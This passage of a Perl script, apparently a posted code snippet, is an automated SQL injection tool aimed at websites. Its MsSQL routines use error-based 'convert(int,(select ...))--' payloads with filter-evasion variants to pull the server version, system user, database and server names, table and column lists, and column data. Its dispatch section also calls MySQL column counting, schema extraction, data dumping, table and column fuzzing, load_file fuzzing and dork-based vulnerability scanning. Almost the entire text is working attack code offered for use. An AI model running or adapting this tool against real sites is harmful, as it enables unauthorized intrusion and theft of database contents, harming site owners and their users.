  781. $system_user = 'convert(int,(select'.$add.'system_user));--';
  782. $db_name = 'convert(int,(select'.$add.'db_name()));--';
  783. $servername = 'convert(int,(select'.$add.'@@servername));--' ;
  784. my $injection = $site.$version ;
  785. my $request = HTTP::Request->new(GET=>$injection);
  786. my $useragent = LWP::UserAgent->new();
  787. $useragent->timeout(10);
  788. my $response = $useragent->request($request)->as_string ;
  789. if ($response =~ /.*?value\s'/)
  790. {
  791. print BOLD,GREEN,"[+] This Website Is SQL Vulnerable ..\n",RESET;
  792. print GREEN,"[+] Working On It ..\n",RESET;
  793. $ver = $1 if ($response =~ /.*?value\s'(.*?)'\sto.*/sm) ;
  794. print GREEN,"\n[!] MsSQL Version Is :",RESET;
  795. print "\n\n => $ver" ;
  796. my $injection = $site.$system_user ;
  797. my $request = HTTP::Request->new(GET=>$injection);
  798. my $useragent = LWP::UserAgent->new();
  799. $useragent->timeout(10);
  800. my $response = $useragent->request($request)->as_string ;
  801. $system_user = $1 if ($response =~ /.*value\s'(.*)'\sto.*/);
  802. print GREEN,"\n[!] MsSQL System_User Is :",RESET;
  803. print " $system_user " ;
  804. my $injection = $site.$db_name ;
  805. my $request = HTTP::Request->new(GET=>$injection);
  806. my $useragent = LWP::UserAgent->new();
  807. $useragent->timeout(10);
  808. my $response = $useragent->request($request)->as_string ;
  809. $db_name = $1 if ($response =~ /.*value\s'(.*)'\sto.*/);
  810. print GREEN,"\n[!] MsSQL Database Name Is :",RESET;
  811. print " $db_name " ;
  812. my $injection = $site.$servername ;
  813. my $request = HTTP::Request->new(GET=>$injection);
  814. my $useragent = LWP::UserAgent->new();
  815. $useragent->timeout(10);
  816. my $response = $useragent->request($request)->as_string ;
  817. $servername = $1 if ($response =~ /.*value\s'(.*)'\sto.*/);
  818. print GREEN,"\n[!] MsSQL Server Name Is :",RESET;
  819. print " $servername " ;
  820. exit ();
  821. }
  822. else
  823. {
  824. system ("cls");
  825. print BOLD,YELLOW,"\n[!] This Website Is Not SQL Vulnerable !",RESET;
  826. exit();
  827. }
  828. }
  829.  
  830. sub mssqltable
  831. {
  832. my $site = $_[0];
  833. my $ev = $_[1];
  834. if ($ev eq '/*')
  835. {$add = "/**/" ; $com = "/*";}
  836. elsif ($ev eq '%20')
  837. {$add = "%20" ; $com = "%00" ;}
  838. else
  839. {$add = '+' ; $com ='--';}
  840. print GREEN,"\n[+] Table Extracting, Started Please Wait!\n\n",RESET;
  841. $table = "convert(int,(select".$add."top".$add."1".$add."table_name".$add."from".$add."information_schema.tables));--";
  842. $data = "'Ws65qd798sqd9878'";
  843. print GREEN,"[!] Tables : \n\n",RESET;
  844. for ($i;$i<1500;$i++)
  845. {
  846. my $injection = $site.$table ;
  847. my $useragent = LWP::UserAgent->new();
  848. $ua->proxy("http", "http://$proxy/") if defined($proxy);
  849. my $request = $useragent->get($injection);
  850. my $response = $request->content;
  851. if ($response =~ /.*?value\s'(.*?)'\sto.*/sm)
  852. {
  853. print "[+] ".$1."\n";
  854. push (@exttbles,$1);
  855. $start = "(";
  856. $data .= ",'$1'";
  857. $end = ")";
  858. $total = $start.$data.$end;
  859. $table = "convert(int,(select".$add."top".$add."1".$add."table_name".$add."from".$add."information_schema.tables".$add."where".$add."table_name".$add."not".$add."in".$add."$total));--";
  860. }
  861. }
  862. if (defined($vulnfile))
  863. {
  864. open(vuln_file,">>$vulnfile") ;
  865. print vuln_file "[!] Target : $site\n";
  866. print vuln_file "[!] evasion : $ev\n";
  867. print vuln_file "[!] Data :: ---- \n\n\n";
  868. $i=0;
  869. foreach(@exttbles)
  870. {
  871. print vuln_file $exttbles[$i]."\n";
  872. $i++;
  873. }
  874. close(vuln_file);
  875. print YELLOW"\n[+] Result Saved to $vulnfile\n",RESET;
  876. }
  877. }
  878.  
  879. sub mssqlcolumn
  880. {
  881. my $site = $_[0];
  882. my $ev = $_[1];
  883. my $tblextrct = $_[2];
  884. print GREEN,"[+] Table To Extract From $tblextrct\n",RESET;
  885. if ($ev eq '/*')
  886. {$add = "/**/" ; $com = "/*";}
  887. elsif ($ev eq '%20')
  888. {$add = "%20" ; $com = "%00" ;}
  889. else
  890. {$add = '+' ; $com ='--';}
  891. print GREEN,"\n[+] Table Extracting, Started Please Wait!\n\n",RESET;
  892. $data = "'Ws65qd798sqd9878'";
  893. $table = "convert(int,(select".$add."top".$add."1".$add."column_name".$add."from".$add."information_schema.columns".$add."where".$add."table_name"."="."'$tblextrct'".$add."And".$add."column_name".$add."not".$add."in".$add."($data)"."));--";
  894. print GREEN,"[!] Columns : \n\n",RESET;
  895. for ($i;$i<1500;$i++)
  896. {
  897. my $injection = $site.$table ;
  898. my $useragent = LWP::UserAgent->new();
  899. $ua->proxy("http", "http://$proxy/") if defined($proxy);
  900. my $request = $useragent->get($injection);
  901. my $response = $request->content;
  902. if ($response =~ /.*?value\s'(.*?)'\sto.*/sm)
  903. {
  904. print "[+] ".$1."\n";
  905. push (@extcols,$1);
  906. $start = "(";
  907. $data .= ",'$1'";
  908. $end = ")";
  909. $total = $start.$data.$end;
  910. $table = "convert(int,(select".$add."top".$add."1".$add."column_name".$add."from".$add."information_schema.columns".$add."where".$add."table_name"."="."'$tblextrct'".$add."And".$add."column_name".$add."not".$add."in".$add."$total"."));--";
  911. }
  912. }
  913. if (defined($vulnfile))
  914. {
  915. open(vuln_file,">>$vulnfile") ;
  916. print vuln_file "[!] Target : $site\n";
  917. print vuln_file "[!] evasion : $ev\n";
  918. print vuln_file "[!] Data :: ---- \n\n\n";
  919. $i=0;
  920. foreach(@extcols)
  921. {
  922. print vuln_file $extcols[$i]."\n";
  923. $i++;
  924. }
  925. close(vuln_file);
  926. print YELLOW,"\n[+] Result Saved to $vulnfile\n",RESET;
  927. }
  928. }
  929.  
  930. sub mssqldump
  931. {
  932. my $site = $_[0];
  933. my $ev = $_[1];
  934. my $tblextrct = $_[2];
  935. my $colmextrct = $_[3];
  936. print GREEN,"[+] Table : $tblextrct\n";
  937. print "[+] Column : $colmextrct\n",RESET;
  938. if ($ev eq '/*')
  939. {$add = "/**/" ; $com = "/*";}
  940. elsif ($ev eq '%20')
  941. {$add = "%20" ; $com = "%00" ;}
  942. else
  943. {$add = '+' ; $com ='--';}
  944. print GREEN,"\n[+] Table Extracting, Started Please Wait!\n\n",RESET;
  945. $data = "'Ws65qd798sqd9878'";
  946. $table = "convert(int,(select".$add."top".$add."1".$add."$colmextrct".$add."from".$add."$tblextrct".$add."where".$add."$colmextrct".$add."not".$add."in".$add."($data)"."));--";
  947. print GREEN,"[!] Columns : \n\n",RESET;
  948. for ($i;$i<1500;$i++)
  949. {
  950. my $injection = $site.$table ;
  951. my $useragent = LWP::UserAgent->new();
  952. $ua->proxy("http", "http://$proxy/") if defined($proxy);
  953. my $request = $useragent->get($injection);
  954. my $response = $request->content;
  955. if ($response =~ /.*?value\s'(.*?)'\sto.*/sm)
  956. {
  957. print "[+] ".$1."\n";
  958. push (@dumpdata,$1);
  959. $start = "(";
  960. $data .= ",'$1'";
  961. $end = ")";
  962. $total = $start.$data.$end;
  963. $table = "convert(int,(select".$add."top".$add."1".$add."$colmextrct".$add."from".$add."$tblextrct".$add."where".$add."$colmextrct".$add."not".$add."in".$add."$total"."));--";
  964. }
  965. }
  966. if (defined($vulnfile))
  967. {
  968. open(vuln_file,">>$vulnfile") ;
  969. print vuln_file "[!] Target : $site\n";
  970. print vuln_file "[!] evasion : $ev\n";
  971. print vuln_file "[!] Data :: ---- \n\n\n";
  972. $i=0;
  973. foreach(@dumpdata)
  974. {
  975. print vuln_file $dumpdata[$i]."\n";
  976. $i++;
  977. }
  978. close(vuln_file);
  979. print YELLOW,"\n[+] Result Saved to $vulnfile\n",RESET;
  980. }
  981. }
  982.  
  983. variables();
  984. main();
  985.  
  986. if (defined($search_dork))
  987. {
  988. print BOLD,GREEN,"[+] Vulnerability Scan\n" ;
  989. print "[+] Dork : $search_dork\n\n\n",RESET;
  990. vulnscanner();
  991. if (defined($vulnfile))
  992. {
  993. open(vuln_file,">>$vulnfile") ;
  994. print vuln_file @mysqlvuln;
  995. print vuln_file @mssqlvuln;
  996. print vuln_file @accessvuln;
  997. close(vuln_file);
  998. print YELLOW,"[+] Result Saved to $vulnfile\n",RESET;
  999. exit();
  1000. }
  1001. }
  1002.  
  1003. if (defined($mysql_count_target))
  1004. {
  1005. print GREEN,"[+] MySQL Column Counter\n\n" ;
  1006. print "[+] Target : $mysql_count_target\n",RESET ;
  1007. if ($evasion eq '/*')
  1008. {
  1009. print GREEN,"[+] Evasion : /**/\n",RESET;
  1010. }
  1011. elsif ($evasion eq '%20')
  1012. {
  1013. print GREEN,"[+] Evasion : %20\n" ,RESET;
  1014. }
  1015. else
  1016. {
  1017. print GREEN,"[+] Evasion : --\n" ,RESET;
  1018. $evasion = "--"
  1019. }
  1020. mysqlcount($mysql_count_target,$evasion);
  1021. }
  1022.  
  1023. if (defined($mysql_details_target))
  1024. {
  1025. print GREEN,"[+] MySQL database details\n\n" ;
  1026. print "[+] Target : $mysql_details_target\n",RESET;
  1027. if ($evasion eq '/*')
  1028. {
  1029. print GREEN,"[+] Evasion : /**/\n",RESET;
  1030. }
  1031. elsif ($evasion eq '%20')
  1032. {
  1033. print GREEN,"[+] Evasion : %20\n" ,RESET;
  1034. }
  1035. else
  1036. {
  1037. print GREEN,"[+] Evasion : --\n" ,RESET;
  1038. $evasion = "--"
  1039. }
  1040. mysqldetails($mysql_details_target,$evasion);
  1041. }
  1042.  
  1043. if (defined($mysql_schema_target))
  1044. {
  1045. print GREEN,"[+] MySQL Schema Extractor details\n\n" ;
  1046. print "[+] Target : $mysql_schema_target\n" ,RESET;
  1047. if ($evasion eq '/*')
  1048. {
  1049. print GREEN,"[+] Evasion : /**/\n",RESET;
  1050. }
  1051. elsif ($evasion eq '%20')
  1052. {
  1053. print GREEN,"[+] Evasion : %20\n",RESET;
  1054. }
  1055. else
  1056. {
  1057. print GREEN,"[+] Evasion : --\n" ,RESET;
  1058. $evasion = "--"
  1059. }
  1060. mysqlschema($mysql_schema_target,$evasion);
  1061. }
  1062.  
  1063. if (defined($mysql_dump_target))
  1064. {
  1065. if (!defined($sql_dump_column))
  1066. {
  1067. print YELLOW,"[!] Please Defind At Least A Column\n",RESET;
  1068. exit();
  1069. }
  1070. elsif (!defined($sql_dump_table))
  1071. {
  1072. print YELLOW,"[!] Please Defind Table Name\n",RESET;
  1073. exit();
  1074. }
  1075. else
  1076. {
  1077. print GREEN,"[+] MySQL Data Dumper details\n\n" ;
  1078. print "[+] Target : $mysql_dump_target\n" ,RESET;
  1079. if ($evasion eq '/*')
  1080. {
  1081. print GREEN,"[+] Evasion : /**/\n" ,RESET;
  1082. }
  1083. elsif ($evasion eq '%20')
  1084. {
  1085. print GREEN,"[+] Evasion : %20\n" ,RESET;
  1086. }
  1087. else
  1088. {
  1089. print GREEN,"[+] Evasion : --\n" ,RESET;
  1090. $evasion = "--"
  1091. }
  1092. mysqldump($mysql_dump_target,$sql_dump_column,$sql_dump_table,$evasion);
  1093. }
  1094. }
  1095.  
  1096. if (defined($mysql_fuzz_table))
  1097. {
  1098. if(!defined($word_list))
  1099. {
  1100. print YELLOW,"[!] Please Define A list of tables to load\n";
  1101. exit();
  1102. }
  1103. else
  1104. {
  1105. print GREEN,"[+] MySQL Tables Fuzzer\n\n" ;
  1106. print "[+] Target : $mysql_fuzz_table\n" ,RESET;
  1107. if ($evasion eq '/*')
  1108. {
  1109. print GREEN,"[+] Evasion : /**/\n",RESET;
  1110. }
  1111. elsif ($evasion eq '%20')
  1112. {
  1113. print GREEN,"[+] Evasion : %20\n",RESET;
  1114. }
  1115. else
  1116. {
  1117. print GREEN,"[+] Evasion : --\n",RESET;
  1118. $evasion = "--"
  1119. }
  1120. mysqlfuzztable($mysql_fuzz_table,$evasion,$word_list);
  1121. }
  1122. }
  1123.  
  1124. if (defined($mysql_fuzz_column))
  1125. {
  1126. if(!defined($word_list))
  1127. {
  1128. print YELLOW,"[!] Please Define A list of tables to load\n",RESET;
  1129. exit();
  1130. }
  1131. elsif(!defined($sql_dump_table))
  1132. {
  1133. print YELLOW,"[!] Please Define A Table To Fuzz it's Columns\n",RESET;
  1134. exit();
  1135. }
  1136. else
  1137. {
  1138. print GREEN,"[+] MySQL Columns Fuzzer\n\n" ;
  1139. print "[+] Target : $mysql_fuzz_column\n",RESET ;
  1140. if ($evasion eq '/*')
  1141. {
  1142. print GREEN,"[+] Evasion : /**/\n" ,RESET;
  1143. }
  1144. elsif ($evasion eq '%20')
  1145. {
  1146. print GREEN,"[+] Evasion : %20\n",RESET;
  1147. }
  1148. else
  1149. {
  1150. print GREEN,"[+] Evasion : --\n",RESET;
  1151. $evasion = "--"
  1152. }
  1153. mysqlfuzzcolumn($mysql_fuzz_column,$evasion,$word_list,$sql_dump_table);
  1154. }
  1155. }
  1156.  
  1157. if (defined($mysql_load_file))
  1158. {
  1159. if(!defined($word_list))
  1160. {
  1161. print YELLOW,"[!] Please Define A list of tables to load\n",RESET;
  1162. exit();
  1163. }
  1164. else
  1165. {
  1166. print GREEN,"[+] MySQL Load_File Fuzzer\n\n" ;
  1167. print "[+] Target : $mysql_load_file\n",RESET;
  1168. if ($evasion eq '/*')
  1169. {
  1170. print GREEN,"[+] Evasion : /**/\n" ,RESET;
  1171. }
  1172. elsif ($evasion eq '%20')
  1173. {
  1174. print GREEN,"[+] Evasion : %20\n" ,RESET;
  1175. }
  1176. else
  1177. {
  1178. print GREEN,"[+] Evasion : --\n" ,RESET;
  1179. $evasion = "--"
  1180. }
  1181. mysqlfile($mysql_load_file,$evasion,$word_list);
  1182. }
  1183. }
  1184.  
  1185. if (defined($mssql_details_target))
  1186. {
  1187. print GREEN,"[+] MsSQL DB Details\n\n" ;
  1188. print "[+] Target : $mssql_details_target\n" ,RESET;
  1189. if ($evasion eq '/*')
  1190. {
  1191. print GREEN,"[+] Evasion : /**/\n" ,RESET;
  1192. }
  1193. elsif ($evasion eq '%20')
  1194. {
  1195. print GREEN,"[+] Evasion : %20\n" ,RESET;
  1196. }
  1197. else
  1198. {
  1199. print GREEN,"[+] Evasion : --\n",RESET;
  1200. $evasion = "--"
  1201. }
  1202. mssqldetails($mssql_details_target,$evasion);
  1203. }
  1204.  
  1205. if (defined($mssql_table_target))
  1206. {
  1207. print GREEN,"[+] MsSQL Tables Extractor\n\n" ;
  1208. print "[+] Target : $mssql_table_target\n" ,RESET;
  1209. if ($evasion eq '/*')
  1210. {
  1211. print GREEN,"[+] Evasion : /**/\n",RESET;
  1212. }
  1213. elsif ($evasion eq '%20')
  1214. {
  1215. print GREEN,"[+] Evasion : %20\n" ,RESET;
  1216. }
  1217. else
  1218. {
  1219. print GREEN,"[+] Evasion : --\n" ,RESET;
  1220. $evasion = "--"
  1221. }
  1222. mssqltable($mssql_table_target,$evasion);
  1223. }
  1224.  
  1225. if (defined($mssql_column_target))
  1226. {
  1227. if(!defined($sql_dump_table))
  1228. {
  1229. print YELLOW,"[!] Please Defind At Least A Table do Extract from\n",RESET;
  1230. exit();
  1231. }
  1232. else
  1233. {
  1234. print GREEN,"[+] MsSQL Columns Extractor\n\n" ;
  1235. print "[+] Target : $mssql_column_target\n" ,RESET;
  1236. if ($evasion eq '/*')
  1237. {
  1238. print GREEN,"[+] Evasion : /**/\n",RESET;
  1239. }
  1240. elsif ($evasion eq '%20')
  1241. {
  1242. print GREEN,"[+] Evasion : %20\n",RESET;
  1243. }
  1244. else
  1245. {
  1246. print GREEN,"[+] Evasion : --\n",RESET;
  1247. $evasion = "--"
  1248. }
  1249. mssqlcolumn($mssql_column_target,$evasion,$sql_dump_table);
  1250. }
  1251. }
  1252.  
  1253. if (defined($mssql_dump_target))
  1254. {
  1255. if(!defined($sql_dump_table))
  1256. {
  1257. print YELLOW,"[!] Please Defind At Least A Table\n",RESET;
  1258. exit();
  1259. }
  1260. elsif(!defined($sql_dump_column))
  1261. {
  1262. print YELLOW,"[!] Please Defind At Least A Column\n",RESET;
  1263. exit();
  1264. }
  1265. else
  1266. {
  1267. print GREEN,"[+] MsSQL Data Dumper\n\n" ;
  1268. print "[+] Target : $mssql_dump_target\n",RESET;
  1269. if ($evasion eq '/*')
  1270. {
  1271. print GREEN,"[+] Evasion : /**/\n",RESET;
  1272. }
  1273. elsif ($evasion eq '%20')
  1274. {
  1275. print GREEN,"[+] Evasion : %20\n",RESET;
  1276. }
  1277. else
  1278. {
  1279. print GREEN,"[+] Evasion : --\n",RESET;
  1280. $evasion = "--"
  1281. }
  1282. mssqldump($mssql_dump_target,$evasion,$sql_dump_table,$sql_dump_column);
  1283. }
  1284. }
  1285. #-----------------------------------------------------------#
  1286. # End #
  1287. #-----------------------------------------------------------#

Report this snippet  

You need to login to post a comment.